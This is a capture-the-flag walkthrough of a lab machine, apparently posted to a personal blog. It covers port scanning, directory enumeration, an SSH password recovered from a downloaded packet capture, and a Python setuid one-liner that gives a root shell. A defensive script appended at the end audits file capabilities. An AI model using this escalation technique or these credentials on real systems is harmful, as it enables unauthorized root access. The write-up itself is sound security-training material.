Lluna's Pure land.

What is life like when singing to wine?


HTB-[cap]

0x00. Overview

0x01. Information gathering

The scan shows that ports 21, 22 and 80 are open.

┌──(root💀kali)-[~/htb/cap]
└─# ftp anonymous@10.10.10.245 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-14 00:34 EDT
Nmap scan report for 10.10.10.245
Host is up (0.38s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 193
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid Request Line &#x27;Invalid HTTP request line: &#x27;&#x27;&#x27;
| </body>
| </html>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Wed, 14 Jul 2021 04:39:13 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Wed, 14 Jul 2021 04:39:14 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: GET, HEAD, OPTIONS
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
| </body>
|_ </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1117/tcp filtered ardus-mtrns
3371/tcp filtered satvid-datalnk
5822/tcp filtered unknown
5952/tcp filtered unknown
8652/tcp filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.16 seconds

0x02. Anonymous FTP access

Since port 21 is open, try an anonymous login; as shown below, anonymous login is not allowed.

┌──(root💀kali)-[~/htb/cap]
└─# ftp anonymous@10.10.10.245 1 ⚙
ftp: anonymous@10.10.10.245: Name or service not known
ftp>

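0x03. Visiting port 80

Browsing the site manually shows that it is a management panel for a network device.

Clicking around several times shows that the URL changes as well, and that packet captures can be downloaded.

Scanning the data directory and visiting the results shows six valid links in total: 0, 1, 2, 3, 4 and 5. Download all of them.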

┌──(root💀kali)-[~/htb/cap]
└─# dirb http://10.10.10.245/data/ 1 ⚙
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jul 14 01:10:25 2021
URL_BASE: http://10.10.10.245/data/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.245/data/ ----
+ http://10.10.10.245/data/0 (CODE:200|SIZE:17147)
+ http://10.10.10.245/data/00 (CODE:200|SIZE:17147)
+ http://10.10.10.245/data/01 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/02 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/03 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/04 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/05 (CODE:200|SIZE:17147)
+ http://10.10.10.245/data/1 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/2 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/3 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/4 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/5 (CODE:200|SIZE:17147)

0x04. Packet capture analysis

Of the six captures, only 0.pcap contains useful information: a username and password.

user:nathan

pass:Buck3tH4TF0RM3!

Log in to get the flag.

┌──(root💀kali)-[~]
└─# ssh nathan@10.10.10.245 1 ⚙
nathan@10.10.10.245's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed Jul 14 06:11:21 UTC 2021

System load: 0.04
Usage of /: 35.0% of 8.73GB
Memory usage: 21%
Swap usage: 0%
Processes: 228
Users logged in: 0
IPv4 address for eth0: 10.10.10.245
IPv6 address for eth0: dead:beef::250:56ff:feb9:dda9

=> There are 4 zombie processes.

* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.

https://ubuntu.com/blog/microk8s-memory-optimisation

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

nathan@cap:~$ ls
user.txt
nathan@cap:~$ cat user.txt
*************************
nathan@cap:~$

0x05. Privilege escalation

nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# /bin/bash
root@cap:~# cd /root
root@cap:/root# ls
root.txt snap
root@cap:/root# cat root.txt
****************************
root@cap:/root#
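
An added example, not part of the original write-up: an unprivileged process can call os.setuid(0) successfully only if it is permitted to change UID, which is assumed here to come from a file capability such as cap_setuid on the python3 binary (the page does not show how the binary was configured). The script below filters `getcap -r` output for such root-equivalent capabilities so they can be found and removed; the `RISKY` list, the function names and the sample lines are constructed for illustration.

```sh
#!/bin/sh
# Added example: flag file capabilities that make a binary root-equivalent.
# Real use:  getcap -r / 2>/dev/null | audit_caps

# Capabilities treated as root-equivalent here (illustrative list, an assumption).
# "all" stands for an empty capability list such as "=ep", which grants everything.
RISKY="all cap_setuid cap_setgid cap_sys_admin cap_sys_module cap_sys_ptrace cap_dac_override cap_dac_read_search cap_chown cap_fowner"

# Reads getcap output on stdin, prints "path<TAB>capability<TAB>flags" per finding.
# Accepts both "path = caps+ep" (older libcap) and "path caps=ep" (newer libcap).
# Assumes paths contain no spaces.
audit_caps() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    path=${line%% *}
    spec=${line#* }
    spec=${spec#= }
    for clause in $spec; do
      case $clause in
        *=*) names=${clause%%=*}; flags=${clause#*=} ;;
        *+*) names=${clause%%+*}; flags=${clause#*+} ;;
        *)   continue ;;
      esac
      # Without the permitted bit the file grants nothing by itself at exec time.
      case $flags in *p*) ;; *) continue ;; esac
      [ -n "$names" ] || names=all
      for cap in $(printf '%s' "$names" | tr ',' ' '); do
        case " $RISKY " in
          *" $cap "*) printf '%s\t%s\t%s\n' "$path" "$cap" "$flags" ;;
        esac
      done
    done
  done
}

# Constructed sample of getcap output (not taken from the target host).
sample_getcap() {
  cat <<'EOF'
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/opt/tool cap_setuid=i
/opt/dumper cap_dac_read_search=ep
EOF
}

sample_getcap | audit_caps
```

Once a finding is confirmed as unneeded, `setcap -r <path>` removes the file capability from that binary.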